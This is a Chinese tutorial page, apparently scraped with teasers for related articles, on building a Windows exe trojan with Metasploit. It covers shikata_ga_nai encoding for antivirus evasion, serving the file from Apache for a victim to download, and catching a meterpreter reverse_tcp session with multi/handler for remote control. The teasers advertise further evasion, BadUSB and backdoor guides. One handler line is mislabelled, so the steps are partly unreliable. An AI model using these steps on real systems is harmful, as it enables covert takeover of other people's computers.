msf获取靶机shell进行远控
思路:使用kali工具msf制作exe木马文件靶机通过点击开启后门进行监听
原理:靶机执行木马文件后,向本机(你运行msf的主机)中发送信息建立会话session,本机打开监听状态,收到信息后进行操作
前提:知道主机IP(命令行输入ifconfig)
(1)msf制作木马
输入命令行生成木马exe并保存在var/www/html文件中,这样靶机就可以直接从网页中下载木马
命令行中参数意义:
其中-e x86/Shikata_ga_nai 也就是起到所谓的免杀作用,
然后开启apache服务:(要记住开启apache服务不然无法与外界连接)
(2)靶机下载运行木马本机进行监听
靶机在浏览器中输入192.168.40.140/test.exe(你自己命令行中的IP和文件名)就可以自行 下载木马
主机打开msf
设置一些监听参数:
use exploit/multi/handler只进入侦听模式
set payload windows/meterpreter/reverse_tcp 设定payload选择漏洞利用模块
set LPORT xxxxx 设置自己ip
set LPORT XXXX 指定端口
输入run运行后靶机双击exe运行即可进行监听
其余还有查看靶机屏幕或者控制的其他命令可以自行查询使用
msf获取靶机shell进行远控相关推荐
- Veil生成免杀payload 渗透win10 获取靶机shell
一:实验环境 两台机器处于同网段 攻击机:kali 192.168.115.134 靶机:win10 192.168.115.1 二:Veil下载.安装.使用 kali里默认没有安装Veil,我们通过 ...
- MSF+内网穿透 实现远控
网络攻防如同打仗 知己知彼百战不殆 要想学会防守必先知道敌人如何进攻 此教程的远端测试全是我的好友帮助测试 并非实际攻击!!! 写一篇远程的渗透教程给大家 当然不是为了教大家去黑别人电脑 而是让大家明 ...
- 永恒之蓝漏洞利用(MS17-010)获取shell 及获取靶机屏幕截图
永恒之蓝漏洞利用(MS17-010) 文章目录 永恒之蓝漏洞利用(MS17-010) 一.永恒之蓝(MS17-010)介绍 二.漏洞利用 1.检测目标主机是否存在MS17-010漏洞 2.使用msf攻 ...
- 用nc+简单bat/vbs脚本+winrar制作迷你远控后门
前言 某大佬某天和我聊起了nc,并且提到了nc正反向shell这个概念. 我对nc之前的了解程度仅局限于:可以侦听TCP/UDP端口,发起对应的连接. 真正的远控还没实践过,所以决定写个小后门试一试. ...
- Badusb原理及制作并简单免杀实现远控教程
2014年美国黑帽大会上研究人员JakobLell和Karsten Nohl展示了badusb的攻击方法后,国内与badusb相关的文章虽然有了一些,但是大部分人把相关文章都阅读后还是会有种" ...
- msf之msfvenom的使用—使用Kali渗透工具生成远控木马
一.先解释一下 msfvenom取代了msfpayload和msfencode,常用于生成远控木马,在目标机器上执行后门,在本地机器kali中监听上线. (注意:msfvenom是在shell里使用的 ...
- 远控免杀专题文章(3)-msf自免杀(VT免杀率35/69)
原文链接:远控免杀专题文章(3)-msf自免杀(VT免杀率35/69) 免杀能力一览表 几点说明: 1.上面表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass. 2.为了更好的对比效 ...
- DHCP动态获取及PC远控路由交换机实验
拓扑 部署 先给左边1.0网段的两台pc配置好静态IP地址及其网关 之后配置右边DHCP服务器让右边2.0网段的两个PC可以自动获取IP地址 先配置DHCP服务器 开启DHCP服务并添加 之后我们可以 ...
- 使用远见远控软件控制靶机
控制端:运行在攻击者的电脑中,负责控制其他肉鸡 被控制端:需要生成,与你行在肉鸡上,木马病毒 两端需要数据互通 打开远见,在系统设置里修改密码后重启 然后打开hfs 右键,选择添加文件,将consys ...
最新文章
- Gazebo构建小车模型并通过ROS控制
- 超越百度的口罩检测算法
- Webpack 源码学习系列(一)
- c语言地理坐标存储 转发,纬度/经度坐标的2个列表之间的地理距离
- Python协程:从yield/send到async/await
- U盘的热拔插/自动挂载跟linux2.6 kernel、 udev、 hal、 dbus 、gnome-mount 、thunar的关系...
- 云专网和云专线的区别_云专线的优势及应用场景
- 广州运营开放式数据交易平台发力大数据业务
- Android P2P语音通话实现 【转】http://macleo.iteye.com/blog/1707455
- bzoj 2151 种树 —— 思路+链表
- java文件转base64
- 数学基础二:点到直线距离公式推导
- python为什么卸载不了_为什么Python3.8删除不了?
- 前端工程中常用的文件夹命名(扫盲帖)
- 自适应网站设计中的关键要点
- python换零钱_Python算法之零钱兑换问题的解法
- C++检测内存泄漏方法
- POJ3420-Quad Tiling
- 概率论与数理统计系列笔记之第六章——参数估计
- 2016年底江浙沪绕行游记
热门文章
- C++ 命名空间,也有叫名称空间
- 知衣科技CEO郑泽宇:重新定义服装产业「柔性供应链」
- #visual studio# 运行库MT、MTd、MD、MDd
- 首款搭载鸿蒙系统的车型,国内|网曝首款搭载华为鸿蒙OS的汽车为吉利博越Pro新车 | 电车汇...
- 理解PBR:从原理到实现(上)
- 时序数据库与传统数据库的优势
- 分辨率PPI(Pixel Per Inch)与DPI(Dot Per Inch)
- Sentinel限流规则使用总结
- 《PostgreSQL 开发指南》第 08 篇 备份与恢复
- 计算机表格求和求平均值公式,EXCEL怎么求和,还有求平均值?,excle求和平均